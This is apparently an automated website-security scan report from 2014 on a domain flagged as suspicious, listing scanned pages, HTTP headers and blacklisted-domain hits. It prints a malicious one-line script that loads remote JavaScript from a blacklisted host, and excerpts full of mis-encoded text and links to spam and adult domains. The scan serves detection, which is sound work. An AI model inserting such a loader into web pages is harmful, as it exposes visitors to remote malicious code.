Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=176fgjpcq.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://176fgjpcq.com/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 11:29:38 GMT Accept-Ranges: bytes ETag: "2ecbb38987d4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 20328 Content-Location: http://176fgjpcq.com/index.html Content-Type: text/html Last-Modified: Sat, 20 Sep 2014 04:01:21 GMT X-Powered-By: ASP.NET | clean |
http://176fgjpcq.com/index.html | 200 OK Content-Length: 20328 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: cb88.net ...[2877 bytes skipped]... </div> <div class="aboutbot"></div> </div> </div> <div class="friendly"> <div class="friendlybt">ÓÑÇéÁ´½Ó</div> <div class="fdcon"> <div id="indexad" style="overflow: hidden; width:885px; height: 80px;"> <a href="http://185zxcqsf.net" title="ÈËÌåÒÕÊõÉãÓ°ÍøÕ¾">ÈËÌåÒÕÊõÉãÓ°ÍøÕ¾</a> <a href="http://cb88.net" title="±¬ÈéÃÀŮдÕæ¿ì²¥">±¬ÈéÃÀŮдÕæ¿ì²¥</a> <a href="http://195cywngcq.com" title="Ë¿ÍàÓ£³æ">Ë¿ÍàÓ£³æ</a> <a href="http://2987k7w.com" title="Å·ÖÞ×î´óÉ«ÇéÍøÕ¾">Å·ÖÞ×î´óÉ«ÇéÍøÕ¾</a> <a href="http://gqa7jqi.com" title="smµçÓ°ÍƼö">smµçÓ°ÍƼö</a> <a href="http://tannei.com.cn" title="³ÉÈËÉ«ÇéÂ×Àí°Ù¶ÈÓ°Òô">³ÉÈËÉ«ÇéÂ×Àí°Ù¶ÈÓ°Òô</a> <a href="http://7sf84b4.com" title="ËɵÀ·ã ¿ì²¥">ËɵÀ·ã ¿ì²¥</a> ...[1508 bytes skipped]... | ||
http://176fgjpcq.com/common.js | 200 OK Content-Length: 96 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: js.lwtzdec.com document.writeln("<SCRIPT language=javascript src=\"http://js.lwtzdec.com/zy.js\"></SCRIPT>");
Decoded script: <SCRIPT language=javascript src="http://js.lwtzdec.com/zy.js"></SCRIPT> | ||
http://176fgjpcq.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://176fgjpcq.com/jrmnxzw/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 11:29:42 GMT Accept-Ranges: bytes ETag: "62c34a8c4ed4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 20093 Content-Location: http://176fgjpcq.com/jrmnxzw/index.html Content-Type: text/html Last-Modified: Fri, 19 Sep 2014 21:13:24 GMT X-Powered-By: ASP.NET | clean |
http://176fgjpcq.com/jrmnxzw/index.html | 200 OK Content-Length: 20093 Content-Type: text/html | clean |
http://176fgjpcq.com/zwzmxgw/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 11:29:44 GMT Accept-Ranges: bytes ETag: "0bcac607cd4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 20302 Content-Location: http://176fgjpcq.com/zwzmxgw/index.html Content-Type: text/html Last-Modified: Sat, 20 Sep 2014 02:41:28 GMT X-Powered-By: ASP.NET | clean |
http://176fgjpcq.com/zwzmxgw/index.html | 200 OK Content-Length: 20302 Content-Type: text/html | clean |
http://176fgjpcq.com/sqsfdykb/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 11:29:46 GMT Accept-Ranges: bytes ETag: "b2759a8887d4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 20508 Content-Location: http://176fgjpcq.com/sqsfdykb/index.html Content-Type: text/html Last-Modified: Sat, 20 Sep 2014 04:01:19 GMT X-Powered-By: ASP.NET | clean |
http://176fgjpcq.com/sqsfdykb/index.html | 200 OK Content-Length: 20508 Content-Type: text/html | clean |
http://176fgjpcq.com/yznywmcrsp/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 11:29:47 GMT Accept-Ranges: bytes ETag: "a98a08c4ed4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 20347 Content-Location: http://176fgjpcq.com/yznywmcrsp/index.html Content-Type: text/html Last-Modified: Fri, 19 Sep 2014 21:13:24 GMT X-Powered-By: ASP.NET | clean |
http://176fgjpcq.com/yznywmcrsp/index.html | 200 OK Content-Length: 20347 Content-Type: text/html | clean |
http://176fgjpcq.com/llyxyz/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 11:29:49 GMT Accept-Ranges: bytes ETag: "9c96bf8c4ed4cf1:baba" Server: Microsoft-IIS/6.0 Content-Length: 20098 Content-Location: http://176fgjpcq.com/llyxyz/index.html Content-Type: text/html Last-Modified: Fri, 19 Sep 2014 21:13:25 GMT X-Powered-By: ASP.NET | clean |
http://176fgjpcq.com/llyxyz/index.html | 200 OK Content-Length: 20098 Content-Type: text/html | clean |
http://176fgjpcq.com/llyxyz/12920140920.html | 200 OK Content-Length: 12487 Content-Type: text/html | clean |
http://176fgjpcq.com/sqsfdykb/51920140920.html | 200 OK Content-Length: 12645 Content-Type: text/html | clean |
http://176fgjpcq.com/yznywmcrsp/88320140920.html | 200 OK Content-Length: 12349 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: lnpabj.com ...[2458 bytes skipped]... t; <div class="clear"></div> </ul> <div class="post-nav"> µ±Ç°Î»Öãº<a href="http://176fgjpcq.com/">Ê×Ò³</a> > <a href="http://176fgjp±¾ú¾»ÓÃ0¾ç±¾×ÜÓÐС°ëûÓлá±ä¡£Òâ´óÀûÈËÖÖÕñÐ˻Ðû²¼ÖÕÁË<BR>×ÊÁÏ£¬¿ÉÍƽøÁÜ°ÍÖظ´Ð¡·Ûµ÷Öƶø³ÉµÄµ°Çåºý½«ÕÅijÆÖÁÏçϵÄÒ»¼ä¾É³§·¿ÄÚÅßÌ¥ÕýÔÚÈÑÉïºóÆÚ²ÊÉ«Æß·Ö¿ãÍùÄê2Ô·ݡ£</p> תÔØÇë×¢Ã÷ÎÄÕ³ö´¦:<a href="http://lnpabj.com/jkf9n5">ÐÔ¸ÐƬ¸ßÇå</a>http://lnpabj.com/jkf9n5 <div class="aboutbt over"> <h6 class="post-footer"> ·ÖÀà:<a href="http://176fgjpcq.com/yznywmcrsp/">ÑÇÖÞÅ®ÓÅÎåÂë³ÉÈËÊÓƵ</a> | </h6> </div> </div> <div class="post-nav"> <span>ÉÏһƪ£º<a href='http://176fgjpcq.com/zwzmxgw/58320140920.html'>www(tiantian(ÄÐÈËͻȻһ</a></span> <span>ÏÂһƪ£º<a href='http:// ...[1998 bytes skipped]... | ||
http://176fgjpcq.com/zwzmxgw/58320140920.html | 200 OK Content-Length: 12684 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ytnn.net ...[2449 bytes skipped]... ></li> <div class="clear"></div> </ul> <div class="post-nav"> µ±Ç°Î»Öãº<a href="http://176fgjpcq.com/">Ê×Ò³</a> > <a href="http://176youku.com/v1.0.0149/v/swf/qplayer_rtmp.swf?VideoIDS=XNTI5ODg4MTY0" menu="true" loop="true" play="true" scale="ShowAll" wmode="Window" quality="1"></embed></p> תÔØÇë×¢Ã÷ÎÄÕ³ö´¦:<a href="http://ytnn.net/qjfn7">°×»¢Å®ÀÉÈËÌåÒÕÊõ</a>http://ytnn.net/qjfn7 <div class="aboutbt over"> <h6 class="post-footer"> ·ÖÀà:<a href="http://176fgjpcq.com/zwzmxgw/">×Ôο×îÃÍÐÔ¸ÐÍø</a> | </h6> </div> </div> <div class="post-nav"> <span>ÉÏһƪ£º<a href='http://176fgjpcq.com/jrmnxzw/19920140920.html'>µç»°Ð¡ÄÐ×ÓºººÍHµÄС˵µÚÒ»ÅÌ´ø×ÓÊÕÆð</a></span> <span>ÏÂһƪ£º<a href='htt ...[2010 bytes skipped]... | ||
http://176fgjpcq.com/jrmnxzw/19920140920.html | 200 OK Content-Length: 11720 Content-Type: text/html | clean |
http://176fgjpcq.com/zwzmxgw/14320140920.html | 200 OK Content-Length: 12310 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: sh-zz.com ...[2447 bytes skipped]... <div class="clear"></div> </ul> <div class="post-nav"> µ±Ç°Î»Öãº<a href="http://176fgjpcq.com/">Ê×Ò³</a> > <a href="http://176fgjpcq.com/zwzmxgw/">×Ôο×îÃÍÐÔ¸ÐÍø</v1.0.0149/v/swf/qplayer_rtmp.swf?VideoIDS=XNTE2OTgzNTcy" menu="true" loop="true" play="true" scale="ShowAll" wmode="Window" quality="1"></embed></p> תÔØÇë×¢Ã÷ÎÄÕ³ö´¦:<a href="http://sh-zz.com/x7ma5">°µÒ¹ÒùÒùÍø</a>http://sh-zz.com/x7ma5 <div class="aboutbt over"> <h6 class="post-footer"> ·ÖÀà:<a href="http://176fgjpcq.com/zwzmxgw/">×Ôο×îÃÍÐÔ¸ÐÍø</a> | </h6> </div> </div> <div class="post-nav"> <span>ÉÏһƪ£º<a href='http://176fgjpcq.com/jrmnxzw/5820140920.html'>°Ù¶ÈÓ°Òô¿´²Ô¾®¿ÕÈý¼¶Æ¬´óÅ£ÐÄÀïÕâÑùÏë×Åì˳Àû</a></span> <span>ÏÂһƪ£º<a href= ...[2019 bytes skipped]... | ||
http://176fgjpcq.com/jrmnxzw/5820140920.html | 200 OK Content-Length: 12324 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 176fgjpcq.com
Result:
HTTP/1.1 200 OK
Date: Sat, 20 Sep 2014 11:29:38 GMT
Accept-Ranges: bytes
ETag: "2ecbb38987d4cf1:baba"
Server: Microsoft-IIS/6.0
Content-Length: 20328
Content-Location: http://176fgjpcq.com/index.html
Content-Type: text/html
Last-Modified: Sat, 20 Sep 2014 04:01:21 GMT
X-Powered-By: ASP.NET
...20328 bytes of data.
GET / HTTP/1.1
Host: 176fgjpcq.com
Result:
HTTP/1.1 200 OK
Date: Sat, 20 Sep 2014 11:29:38 GMT
Accept-Ranges: bytes
ETag: "2ecbb38987d4cf1:baba"
Server: Microsoft-IIS/6.0
Content-Length: 20328
Content-Location: http://176fgjpcq.com/index.html
Content-Type: text/html
Last-Modified: Sat, 20 Sep 2014 04:01:21 GMT
X-Powered-By: ASP.NET
...20328 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 176fgjpcq.com
Referer: http://www.google.com/search?q=176fgjpcq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 176fgjpcq.com
Referer: http://www.google.com/search?q=176fgjpcq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.